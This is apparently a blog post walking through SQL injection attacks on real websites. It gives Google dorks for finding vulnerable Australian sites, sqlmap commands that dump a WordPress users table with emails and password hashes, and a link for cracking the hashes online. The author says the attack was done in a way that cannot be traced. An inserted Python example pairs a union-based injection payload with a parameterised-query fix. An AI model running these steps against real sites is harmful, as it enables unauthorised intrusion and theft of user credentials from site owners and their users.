I was very curious about MySQL injection (a common vulnerability found in many websites), so I started learning about it and tried to exploit a couple of test websites.

After a couple of test runs, I exploited it in a manner that can’t be traced back.

I won’t go into more detail here but will jump directly to exploiting one of the websites.

For detailed theory and explanation, see: http://securityoverride.org/articles.php?article_id=1

Step 1. Google Dork for MySQL injection

inurl=category.php?id= site:com.au (This lists all Australian sites that have category.php?id= in the URL.)

You can refer to these good collections of Google Dorks for different kinds of attacks:

http://www.exploit-db.com/google-dorks/

Joomla: http://www.hackerbradri.com/2012/07/google-dorks-for-jamoola.html

SQLi – RFI – LFI – Joomla http://pastebin.com/92rkBSps

WordPress: http://newexploits.com/wordpress/tag/google-dork/

Step 2: Information Gathering and Scanning

Now that you have decided on your target, we need to gather information about it.

Information gathering is the most important baseline on which your entire POA (Plan Of Action) depends.

Here I am using OWASP ZAP 2.0.0; installation is pretty straightforward. BackTrack/Kali comes with ZAP installed by default.

On Windows, keep clicking and the installation is done. 😛 :)

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

After the scan, we got 2 vulnerabilities:

  • Cross Site Scripting
  • SQL Injection (Union Based)
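As an added example (not from the original post), here is what the union-based SQL injection ZAP reported looks like in code for a category.php?cat_id= style lookup, next to the parameterised fix. The tables, rows and the Python/sqlite3 stand-in for PHP/MySQL are constructed for illustration.

```python
import sqlite3

# Constructed sample data standing in for a small WordPress-style site.
CATEGORIES = [(1, "Books"), (2, "Games")]
USERS = [("admin", "21232f297a57a5a743894a0e4a801fc3")]  # unsalted MD5, constructed


def make_db():
    """Build an in-memory database with the two tables the example touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (cat_id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", CATEGORIES)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", USERS)
    return conn


def category_unsafe(conn, cat_id):
    """Vulnerable pattern: the raw query-string value is pasted into the SQL
    text, so a UNION inside the parameter runs as part of the query."""
    sql = "SELECT cat_id, name FROM categories WHERE cat_id = " + cat_id
    return conn.execute(sql).fetchall()


def category_safe(conn, cat_id):
    """Hardened version: validate the type and bind the value as a parameter,
    so the database only ever sees the fixed query text."""
    if not cat_id.isdigit():
        return []  # not a valid id; treat it as "no such category"
    sql = "SELECT cat_id, name FROM categories WHERE cat_id = ?"
    return conn.execute(sql, (int(cat_id),)).fetchall()


# The two-column UNION shape that the union-based technique depends on:
# it must match the column count of the original SELECT.
PAYLOAD = "1 UNION SELECT user_login, user_pass FROM wp_users"

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", category_unsafe(db, PAYLOAD))  # leaks the wp_users row
    print("safe:  ", category_safe(db, PAYLOAD))    # []
    print("safe:  ", category_safe(db, "1"))        # [(1, 'Books')]
```

The unsafe query returns the category row plus the wp_users credentials in the same result set, which is exactly what lets a tool dump other tables through a category page; the bound-parameter version returns nothing for the same input.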

Step 3: Exploit the loopholes.

I’ve used sqlmap here.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

http://sqlmap.org/

This first sqlmap run will list all the databases and also confirm whether the URL is vulnerable to SQL injection.

Once done, say you have the DB as example_db. Let’s exploit further to fetch the tables.

  • Select the table and fetch the information pertaining to it.

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users --columns

We will get the names of the columns in that table along with their data types.

  • Exploiting further:

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users -C ID,user_email,user_login,user_pass --dump

It’s done. Hacked, with passwords.

From the screenshot above, we couldn’t crack the first entry.

Let’s try it online. 🙂

http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php

Cheers!!!!!!!!!!!!!!! 🙂